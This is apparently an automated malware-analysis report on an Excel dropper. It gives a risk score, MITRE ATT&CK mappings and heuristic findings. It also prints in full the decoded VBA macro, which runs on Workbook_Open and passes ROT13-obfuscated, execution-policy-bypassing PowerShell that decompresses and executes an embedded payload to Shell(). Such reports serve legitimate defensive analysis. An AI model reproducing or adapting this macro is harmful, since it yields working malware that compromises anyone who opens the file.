MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file contains VBA macros, including a Workbook_Open event and a Shell() call, indicating it's designed to execute code upon opening. The extracted VBA script attempts to construct and execute commands using obfuscated strings, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Dropper.Agent-6953410-0' further supports its role as a dropper.
Heuristics 4
-
ClamAV: Doc.Dropper.Agent-6953410-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6953410-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2515 bytes |
SHA-256: 6fe42b46df6ebff24d5e89becb4348e85f1c0651177fe5f5fd265403e26c8c41 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function DateCilly()
DateCilly = "jZVP Cebprff 'pnyY' ""pErNgR"" ""CbjreFURYy -RC OlcNff -AbCEbS -abavagrEn -J 1 $V8T = [FgevAt][PuNe]34 ;Frg-Inevnoyr ('P'+'OV') ( ([PUNE]44).GbFGEVAT() ) ;vRk( ""\"".(${V8T}{1}{0}${V8T}-s 'y'${POV}'fn') ('Rs') (${V8T}{0}{1}{3}{2}${V8T} -s'A'${POV}'Rj'${POV}'pG'${POV}'-bowR');( .('Rs') (${V8T}{2}{3}{1}{4}{0}${V8T}-s'qRE'${POV}'ErnzE'${POV}'V'${POV}'B.Fg'${POV}'rN')((&('Rs') (${V8T}{1}{4}{5}{3}{8}{0}{6}{2}{7}${V8T} -s 'q'${POV}'vb.pB'${POV}'GeRN'${POV}'b'${POV}'ZCERF'${POV}'FV'${POV}'rSyNGrf'${POV}'z'${POV}'a.')( [VB.ZrZBeLFGERnZ][FlfgRz.PBaIREg]::${V8T}sEb`ZONfr6`4`F`GeVat${V8T}((${V"
End Function
Function Logocompany()
Logocompany = "BzcerfFVBa.pBzCERfFvbazbQr]::${V8T}qr`PbZc`ERfF${V8T} ) ) ${POV}[FLfgRz.grkG.rApBqVat]::${V8T}Nfp`vV${V8T})).${V8T}ER`NQgB`raq${V8T}()|. ( `${IRE`O`bFR`c`ErS`rErapR}.${V8T}gb`FG`EVaT${V8T}()[1${POV}3]+'k'-WbVA'')""\"" )"""
End Function
Sub Workbook_Open()
If hinttmessage > 79 Then Z# = R#: Shippingord Else Debug.Print: Application.Quit
End Sub
Function Shippingord()
EE = EX
If mfRTF > 0 Then seEE = (Shell#((ACTrep(DateCilly) & tetraa & ACTrep(Logocompany)), msoBalloonButtonCancel + 2))
End Function
Function tetraa()
For tt = 1 To 8
tetbb = tetbb + Cells(tt, 1)
Next tt
tetraa = tetbb
End Function
Function ACTrep(Test$) As String
Dim tt As Long, x As Integer, y As Integer
For tt = 1 To Len(Test$)
y% = 0
x% = Asc(Mid$(Test$, tt, 1))
If (x% > 64 And x% < hinttmessage + 10) Or (x% > 96 And x% < 123) Then
y% = 13
x% = x% - y%
If x% < hinttmessage + 16 And x% > hinttmessage + 2 Then x% = x% + 26 Else If x% < 65 Then x% = x% + 26
End If
Mid$(Test$, tt, 1) = Chr$(x%)
Next tt
ACTrep = Test$
End Function
Function hinttmessage()
hinttmessage = (((((((((((Application.International(xlDate))))))))))))
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.